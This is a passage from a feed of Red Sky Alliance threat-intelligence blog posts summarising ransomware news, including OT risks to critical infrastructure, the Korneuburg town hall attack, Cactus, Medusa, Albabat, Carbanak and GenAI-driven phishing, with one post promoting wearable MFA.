<p>This hasn't happened yet, according to CISA. "You could draw parallels with PLCs being taken down," CISA Industrial Control Systems cybersecurity lead recently passed. Last December CISA, along with the FBI, the US National Security Agency and others warned that Iran-linked cyber thugs had exploited Israeli-made programmable logic controllers (PLCs) used in "multiple" water systems and other operational technology environments at facilities across the US, according to multiple law enforcement agencies. "Was it ransomware? No. The device was effectively reflashed and all the code was stripped off of it," he explained, noting that these incidents did produce a similar impact on the OT systems, although with an easier recovery for defenders. "The ransomware business model is buying and sharing tools," he added. "Developing abilities that specifically infect OT systems cost money, and they are already making money hand over fist, so why bother?"</p>
<p>Of course, shutting down industrial controls would be "very bad" and prompt a "much more voracious" response from law enforcement. "If you can't handle the traditional IT ransomware, you're certainly not going to be able to handle OT ransomware recovery," he confirmed.</p>
<p>OT configurations, as well as backup and recovery for these systems and processes, are more complex than standard business IT environments. A lot of the time, critical infrastructure owners and operators contract directly with the OT and ICS vendors to handle updates and operations.</p>
<p>CISA recommends industrial orgs follow best practices and employ prevention measures for traditional ransomware. But then there's also OT-specific advice: like backing up OT configurations and ladder logic. "Organizations need to be a lot better about actually being able to recover from an attack," experts observed. "That's like the biggest deal with ransomware right now. It's true for IT. It's certainly true for OT, and then the impact of critical infrastructure going down just as far, far worse."</p>
<p>It typically takes victim companies at least five months to recover from an infection, he reported. "That's not going to be acceptable for critical infrastructure."</p>
<p>OT and IoT security firm Armis, in its 2023 attack landscape analysis, reported a 104% year-over-year increase in attempted intrusions across the board, while utility-specific attempts over this same time period grew by 200 percent. This increase represents attack attempts targeting any physical and virtual assets within utilities' environments, including IT, IoT, OT, ICS, building management systems and others, Carlos Buenaño, Armis CTO of OT, explained.</p>
<p>Buenaño experienced this firsthand while working for an energy biz. "In a window of five minutes, I could actually see our demilitarized zone trying to be accessed, and using brute force to get into the OT environment," he said. Armis identified engineering workstations, SCADA servers and PLCs as the riskiest OT and ICS devices outside of the healthcare industry. The 12-month analysis named engineering workstations as the year's most targeted OT device. "The fact is: we need to be prepared, because just the fact that we haven't seen successful ransomware attacks against OT doesn't mean that they haven't been attempted," he warned.</p>
<p>However, securing OT presents its own unique challenges. These environments can't be taken down for frequent maintenance, which means that vulnerabilities remain exposed for extended periods between scheduled outages. "The attackers know the vulnerabilities, they know that these devices are critical and very, very difficult to protect for so many reasons," Buenaño explained. "They are designed to continue running and finding that shutdown window to remediate, update firmware or even replace them when they are end-of-life can be very complex and require a lot of scheduling and strategy."</p>
<p>There's also the issue of OT devices being exposed to the internet. Armis found over the last year that about 80% of engineering workstations and 60 percent of SCADA servers had internet access, increasing organizations' attack surface and risk. Plus, many industrial control devices come with default passwords – which aren't changed by the operators and some don't even support multifactor authentication.</p>
<p>All of these issues came into play in the case of the Iranian crew breaking into US-based water facilities. They likely broke in by using default passwords for internet-accessible PLCs. And in at least one case, the cyber-attack forced a Pennsylvania water authority to switch a pumping station to manual control.</p>
<p>The solution relies on a two-pronged approach. "In some places the solution will be in resiliency, meaning the ability to replace the devices," said an IT/OT expert. This could mean a hot redundant system, meaning multiple units performing the same function, or a cold redundant system, where one is fired up if the master system fails. "This needs to be done based on analysis of the importance of the devices and the impact of having them shut down," he explained.</p>
<p>In addition to resiliency, there's also the need to protect the devices themselves better, and ensure authentication and access controls are all enabled. "Currently the level of security is usually a very simple username and password, if at all," he said. "They are not using, in most cases, multifactor authentication. And in many cases you also have the same access being used for the vendor as well as for some third-party maintenance."</p>
<p>Limited access and stricter authentication methods aren't frequently used "because it's much easier to work without those," he added. "The concern is that if you put too many of these security measures in place, it might actually interfere with your operations." And therein lies the rub: critical infrastructure is all about uptime and availability and security, fairly or not, is seen as the enemy of availability. "A lot of these organizations are still prioritizing availability over actual cyber security," explained an offensive cyber security research evangelist at CyberArk. "So even though there may be free and available guidance, they're not adhering to it, because it has potential availability ramifications if done incorrectly." Plus, there's also a massive budget and skills gap between critical infrastructure sectors and organizations within the same industry. "Critical infrastructure of water treatment varies from very large metropolitan organizations, all the way down to small municipalities," CyberArk said. "Smaller municipal water treatment facilities, due to so many things like limited budgets, outdated infrastructure, limited expertise within these organizations, are target-rich, resource-poor organizations that make for fantastic targets of opportunistic ransomware attackers."</p>
<p>CyberArk pointed to CISA's resources for securing water systems, these are also available for other critical infrastructure sectors in the US and noted many of the government recommendations come down to basic security hygiene. This includes using strong, unique passwords and turning on multifactor authentication, if possible. Also, using network segmentation and air-gapping critical systems. "If this is critical infrastructure, protect it like it's critical infrastructure," he declared. "This is a standard operating procedure in IT environments, and it should be extended into OT as well." </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.msn.com/en-us/news/technology/is-critical-infrastructure-prepared-for-ot-ransomware/ar-BB1hFPsp">https://www.msn.com/en-us/news/technology/is-critical-infrastructure-prepared-for-ot-ransomware/ar-BB1hFPsp</a></p></div>Funerals in Austria Canceled by Hackershttps://redskyalliance.org/xindustry/funerals-in-austria-canceled-by-hackers2024-02-12T12:55:00.000Z2024-02-12T12:55:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p>Is nothing sacred? Criminal hackers have reached a new low. The Municipality of Korneuburg in Austria said it was hit by a ransomware attack, leading to funerals reportedly being canceled and the town hall informing residents its staff can only be reached via telephone. The small town on the banks of the Danube a few kilometers north of Vienna has a population of under 13,000 people. In a statement on the municipality’s website, the town hall said its technical department was “working hard to resolve the problem” and guarantee the security of the authority’s data. According to media reports, the ransomware attack has affected all of the data held by the administration, including the backup system. Officials have confirmed receiving an extortion demand.</p>
<p>The local Austrian newspaper Mein Bezirk quoted the council’s deputy mayor Helene Fuchs-Moser saying: “Everything is dead, we can’t even print out registration forms or death certificates or transfer bills.” Noen, another local paper, reported that funerals have been canceled because of the inability to issue death certificates. Most countries require funeral directors to receive a certificate before burying or cremating the deceased.</p>
<p>The town hall's IT manager, Christopher Kremlicka, discovered the attack last week on the night of 2 February. “I suddenly received an email saying that something was happening in our data area that shouldn't be happening. Of course, I checked it immediately and noticed that everything was encrypted,” said Kremlicka.</p>
<p>Officials said they had reported the incident and extortion attempt to the police.</p>
<p>Fuchs-Moser, who is leading on the issue while the mayor is on vacation according to Noen, said the administration would not be making an extortion payment. Fuchs-Moser said that the IT team had signed-off on the security of the town hall’s systems as recently as December. “We were certified that everything was safe. Unfortunately the criminals are always one step further.”</p>
<p>Source: <a href="https://therecord.media/funerals-canceled-due-to-ransomware-attack-on-austrian-town?utm_medium=email&_hsmi=293365176&_hsenc=p2ANqtz-996T2KIJTyI_0LcGTZIAMU7qovPhQm3UfVONEyrdAFD08_qlrNzLxVpZRgZg72gNrZHy_kWh4ZIAPvfWQnnfUfq1VVHyE35a4kpo9ueb6LHgqddT8&utm_content=293369973&utm_source=hs_email">Funerals reportedly canceled due to ransomware attack on Austrian town (therecord.media)</a></p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p></div>Cactus Ransomware in Francehttps://redskyalliance.org/xindustry/cactus-ransomware-in-france2024-02-01T12:55:00.000Z2024-02-01T12:55:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12369303100,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12369303100,RESIZE_400x{{/staticFileLink}}" width="250" alt="12369303100?profile=RESIZE_400x" /></a>French multinational Schneider Electric is reporting that its Sustainability Business division suffered from a ransomware attack earlier this month. The company confirmed the incident in a statement this week that the attack affected its Resource Advisory product, a data visualization tool for sustainability information, as well as other “division specific systems.”</p>
<p>Schneider Electric said that data was accessed by the hackers.<a href="#_ftn1">[1]</a> Bleeping Computer, which first reported the incident, said the Cactus ransomware gang is behind the attack. “Schneider Electric Global Incident Response team has been immediately mobilized to respond to the attack, contain the incident, and to reinforce existing security measures. The Sustainability Business division has informed impacted customers,” the company said. “From a recovery standpoint, Sustainability Business is performing remediation steps to ensure that business platforms will be restored to a secure environment. Teams are currently testing the operational capabilities of impacted systems with the expectation that access will resume in the next two business days.”</p>
<p>The company noted that Sustainability Business is an autonomous entity operating on an isolated network infrastructure and no other Schneider Electric divisions were affected. Cybersecurity firms have been hired to investigate the incident.</p>
<p>Schneider Electric, which reported a revenue of more than $37 billion in 2022, did not respond to requests for comment about whether the Cactus ransomware group was responsible for the attack, which took place on 17 January.</p>
<p>Microsoft warned of the Cactus ransomware in December 2023, explaining that the group was using online advertisements to infect victims. Incident response firm Dragos also said it is increasingly seeing Cactus ransomware used in attacks on industrial organizations, impacting manufacturing and ICS equipment and engineering sectors.</p>
<p>The group emerged in March 2023 but “appears to be run by skilled, experienced hackers,” ransomware expert Allan Liska told Recorded Future News in December. The gang took credit for an attack on Coop, one of Sweden's largest supermarket chains, around New Years.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/cactus-attacks-coop-foods">https://redskyalliance.org/xindustry/cactus-attacks-coop-foods</a></p>
<p>Schneider Electric dealt with data theft by a ransomware gang last year, when the Clop ransomware group stole information from the company using a vulnerability in popular file transfer tool MOVEit.</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/schneider-electric-ransomware-attack-sustainability-division/">https://therecord.media/schneider-electric-ransomware-attack-sustainability-division/</a></p></div>Albabat Ransomwarehttps://redskyalliance.org/xindustry/albabat-ransomware2024-01-30T17:10:00.000Z2024-01-30T17:10:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12368052452,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12368052452,RESIZE_400x{{/staticFileLink}}" width="250" alt="12368052452?profile=RESIZE_400x" /></a>Albabat, also known as White Bat, is a financially motivated ransomware variant written in Rust that identifies and encrypts files important to the user and demands a ransom to release them. It first appeared in November 2023 with the variant Version 0.1.0. Version 0.3.0 was released in late December, followed by version 0.3.3 in mid-January 2024.</p>
<p>Link to full report: <a href="{{#staticFileLink}}12368052261,original{{/staticFileLink}}">IR-24-029-001_WhiteBat.pdf</a></p></div>Medusa Grew New Snakeshttps://redskyalliance.org/xindustry/medusa-grew-new-snakes2024-01-26T17:00:00.000Z2024-01-26T17:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12364610092,RESIZE_930x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12364610092,RESIZE_400x{{/staticFileLink}}" width="250" alt="12364610092?profile=RESIZE_400x" /></a>The threat actors associated with the Medusa ransomware have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims unwilling to agree to their demands. As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their leak site, such as time extension, data deletion, or downloading all the data. These options have a price tag depending on the organization impacted by this group.</p>
<p>The Roman author Ovid describes the mortal Medusa as a beautiful maiden seduced by Poseidon in the temple of Athena. Such a sacrilege attracted the goddess' wrath, and she punished Medusa by turning her hair into snakes. While these stories sound fantastical today, to the ancient Greeks, they were quasi-historical.</p>
<p>Medusa (not to be confused with Medusa Locker) refers to a ransomware family that appeared in late 2022 before coming into prominence in 2023. It's known for opportunistically targeting high technology, education, manufacturing, healthcare, and retail industries.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/redshorts2023/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-wor">https://redskyalliance.org/redshorts2023/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-wor</a></p>
<p>As many as 74 organizations, mostly in the US, the UK, France, Italy, Spain, and India, are estimated to have been impacted by the ransomware in 2023. Ransomware attacks organized by the group commence with exploiting internet-facing assets or applications with known unpatched vulnerabilities and hijacking legitimate accounts, often employing initial access brokers to obtain a foothold to target networks.</p>
<p>In one instance, researchers observed a Microsoft Exchange Server being exploited to upload a web shell, which was then used as a conduit to install and execute the ConnectWise remote monitoring and management (RMM) software. A notable aspect of the infections is the reliance on living-off-the-land (LotL) techniques to blend in with legitimate activity and sidestep detection. Also observed is using a pair of kernel drivers to terminate a hard-coded list of security products.</p>
<p>The initial access phase is followed by discovery and reconnaissance of the compromised network, with the actors ultimately launching the ransomware to enumerate and encrypt all files save for those with the extensions .dll, .exe, .lnk, and .medusa (the extension given to the encrypted files).</p>
<p>For each compromised victim, Medusa's leak site displays information about the organizations, ransom demanded, the amount of time left before the stolen data is released publicly, and the number of views in a bid to exert pressure on the company. The cyber threat actors also offer different choices to the victim, all of which involve some form of extortion to delete or download the pilfered data and seek a time extension to prevent the data from being released.</p>
<p>As ransomware continues to be an uncontrolled threat, targeting tech companies, healthcare, critical infrastructure, and everything in between, the threat actors behind it are getting more brazen with their tactics, going beyond publicly naming and shaming organizations by resorting to threats of physical violence and even dedicated public relations channels. Recent ransomware has changed many facets of the threat landscape, but a key recent development is its increasing commoditization and professionalization. The actors have become more business savvy.</p>
<p>Medusa has a media team to handle its branding efforts likely and leverages a public Telegram channel named "information support," where files of compromised organizations are shared and can be accessed over the clarinet. The channel was set up in July 2021. “The emergence of the Medusa ransomware in late 2022 and its notoriety in 2023 marks a significant development in the ransomware landscape," the researchers said. "This operation showcases complex propagation methods, leveraging both system vulnerabilities and initial access brokers, while adeptly avoiding detection through living-off-the-land techniques."</p>
<p>The development comes as Arctic Wolf Labs publicized two cases in which Akira and Royal ransomware gang victims were targeted by malicious third parties posing as security researchers for secondary extortion attempts. Threat actors spun a narrative of trying to help victim organizations, offering to hack into the server infrastructure of the original ransomware groups involved to delete exfiltrated data, security researchers noted the threat actor sought about five (5) bitcoin in exchange for the service.</p>
<p>It also follows a new advisory from the Finnish National Cyber Security Centre (NCSC-FI) about a spike in Akira ransomware incidents in the country towards the end of 2023 by exploiting a security flaw in Cisco VPN appliances (CVE-2023-20269, CVSS score: 5.0) to breach domestic entities.</p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html">https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html</a></p></div>Ransomware Armageddonhttps://redskyalliance.org/xindustry/ransomware-armageddon2024-01-20T12:30:00.000Z2024-01-20T12:30:00.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}12361106501,original{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12361106501,RESIZE_400x{{/staticFileLink}}" width="250" alt="12361106501?profile=RESIZE_400x" /></a>The least surprising headline from 2023 is that ransomware again set new records for a number of incidents and the damage inflicted. There were new headlines every week, which included big name organizations: MGM, Johnson Controls, Chlorox, Hanes Brands, Caesars Palace, and so many others.</p>
<p>Phishing-driven ransomware is the cyber threat that looms larger and more dangerous than all others. CISA and Cisco report that 90% of data breaches are the result of phishing attacks and monetary losses that exceed $10 billion in total. A report from Splunk revealed that 96 percent of companies fell victim to at least one phishing attack in the last 12 months and 83 percent suffered two or more.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/impersonation-at-the-top-of-phishing-attack-plans">https://redskyalliance.org/xindustry/impersonation-at-the-top-of-phishing-attack-plans</a></p>
<p>Cybersecurity professionals have seen incredible advances in defenses in the past 20 years. The one thing that has not advanced is humans. Users in every organization and not much more advanced at stopping cyber-attacks than they were two decades ago. This is why phishing is so effective for cybercriminals, because it exploits human weaknesses, not technology. That leaves legacy MFA as the most critical defense mechanism. Most companies are using legacy MFA technology that is over 20 years old.</p>
<p>With the rise of Generative Artificial Intelligence (GenAI), cybercriminals are able to take phishing to an entirely new level where every attack can become nearly impossible for users to identify, and attackers will now be able to do this with little effort. Read on to find out why, and what you can do about it. Phishing uses deceptive communications emails, text messages, and voice messages to trick users into revealing sensitive information, including login credentials, passwords, one-time passwords, personal information, and clicking on phony approval messages.</p>
<p>Cybercriminal gangs are learning to use the incredible power of GenAI tools like fraud-versions of ChatGPT to create more persuasive, convincing, and realistic phishing messages. This highly personalized and context-aware text is practically indiscernible from normal human communication. This makes it extremely challenging for recipients to tell the difference between genuine and fake messages. LLMs also allow almost anyone, not just the hacking pros, to launch phishing attacks.</p>
<p>Traditional anti-phishing solutions are not effective at detecting the latest phishing messages created by GenAI. GenAI content lacks telltale signs of phishing, like misspellings or generic language. Phishing detection tools rely on pattern recognition and known indicators of phishing that will no longer be present. Perhaps more worrisome, GenAI tools are enabling cybercriminals to conduct highly targeted phishing campaigns on a massive scale. Threat actors can now automate the generation of a virtually unlimited number of custom-tailored phishing messages for a wide range of victims.</p>
<p>The explosion of GenAI-powered phishing attacks raises a big question: will we ever be able to spot super realistic fakes? Are we losing the fight against phishing? This question is leading many companies to reexamine their anti-phishing tactics. To fight phishing attacks head-on, they must upgrade the primary targets of phishing: credentials and legacy MFA. By going passwordless to eliminate reliance on traditional credentials and by implementing next-generation MFA To replace the 20-year-old technology of legacy MFA.</p>
<p>Innovative companies are moving away from username and password to passwordless authentication. Yet these solutions, while a giant leap forward, also have limitations. A lost, stolen, or compromised device that is not biometric can be used to gain unauthorized access, and mobile phones and other BYOD devices are out of the control of the organization and are susceptible to all types of malware being downloaded by the user.</p>
<p>For these reasons and others, security-first companies are making the decision to move to next-generation multi-factor authentication. The next-generation MFA replaces traditional credentials, password-based authentication, and inconvenient and vulnerable legacy MFA solutions. The next-generation MFA paradigm relies on a physical, wearable FIDO2-compliant device that eliminates the human factor in phishing making it virtually phishing-proof. These cutting-edge biometric wearables also protect organizations against BYOD vulnerabilities, lost and stolen credentials, weak passwords, credential stuffing, MFA prompt bombing, and easily stolen SMS one-time passcodes.</p>
<p>Unlike traditional MFA, attackers simply cannot bypass next-gen MFA with malware, MFA fatigue attacks, adversary-in-the-middle (AiTM) attacks, and other methods. Since the authenticator always remains with the user, wearable next-gen MFA tokens are constantly safe and immediately available for authentication. Only the authorized user can use the device, and no attacker can access the secrets, keys, and biometrics stored on it.</p>
<p>GenAI is powering the coming tsunami of phishing attacks that are effectively nullifying traditional phishing defenses and obsoleting legacy MFA. Wearable, next-generation MFA devices like Token Ring stop the most sophisticated phishing attacks and are the best defense against the coming phishing Armageddon.</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p> </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p> </p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2024/01/there-is-ransomware-armageddon-coming.html">https://thehackernews.com/2024/01/there-is-ransomware-armageddon-coming.html</a></p></div>Carbanak Banking Malwarehttps://redskyalliance.org/xindustry/carbanak-banking-malware2024-01-05T13:00:00.000Z2024-01-05T13:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12345056663,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12345056663,RESIZE_180x180{{/staticFileLink}}" width="175" alt="12345056663?profile=RESIZE_180x180" /></a>The banking malware known as Carbanak has been observed to be used in ransomware attacks with updated tactics. The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness. Carbanak returned in November 2023 through new distribution chains and has been distributed through compromised websites to impersonate various business-related software.</p>
<p>See: <a href="https://redskyalliance.org/Finance/never-take-malware-from-strangers">https://redskyalliance.org/Finance/never-take-malware-from-strangers</a></p>
<p>Some impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero. Carbanak, detected in use since at least 2014, is known for its data exfiltration and remote control features. Starting off as banking malware, it has been used by the FIN7 cybercrime syndicate.<a href="#_ftn1">[1]</a></p>
<p>In the latest attack chain, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to trigger the deployment of Carbanak. The development comes as 442 ransomware attacks were reported last month, up from 341 incidents in October 2023. This year, 4,276 cases have been reported, which is "less than 1000 incidents fewer than the total for 2021 and 2022 combined (5,198)."</p>
<p>Data shows that industrials (33%), consumer cyclical (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks. As for the most commonly spotted ransomware families, LockBit, BlackCat, and Play contributed to 47% (or 206 attacks) of 442 attacks. With BlackCat dismantled by authorities this month, it remains to be seen what impact the move will have on the threat landscape shortly.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/those-darn-blackcats">https://redskyalliance.org/xindustry/those-darn-blackcats</a></p>
<p>According to investigators, the total number of attacks has surpassed 4,000 which marks a massive increase from 2021 and 2022, so it will be interesting to see if ransomware levels continue to climb next year. The spike in ransomware attacks in November 2023 has also been corroborated by cyber insurance firm Corvus, which said it identified 484 new ransomware victims posted to leak sites.</p>
<p>“The ransomware ecosystem at large has successfully pivoted away from QBot," the company said. "Making software exploits and alternative malware families part of their repertoire is paying off for ransomware groups."</p>
<p>See: <a href="https://redskyalliance.org/xindustry/07734-qbot-the-calculator-episode">https://redskyalliance.org/xindustry/07734-qbot-the-calculator-episode</a></p>
<p>While the shift results from a law enforcement takedown of QBot's (aka QakBot) infrastructure, Microsoft investigators reportedly disclosed details of a low-volume phishing campaign distributing the malware, underscoring the challenges in fully dismantling these groups.</p>
<p>The development comes as Kaspersky revealed Akira ransomware's security measures prevent its communication site from being analyzed by raising exceptions while attempting to access the site using a debugger in the web browser. The Russian cybersecurity company further highlighted ransomware operators' exploitation of different security flaws in the Windows Common Log File System (CLFS) driver CVE-2022-24521, CVE-2022-37969, CVE-2023-23376, CVE-2023-28252 (CVSS scores: 7.8) for privilege escalation.</p>
<p> </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p> </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2023/12/carbanak-banking-malware-resurfaces.html/">https://thehackernews.com/2023/12/carbanak-banking-malware-resurfaces.html/</a></p></div>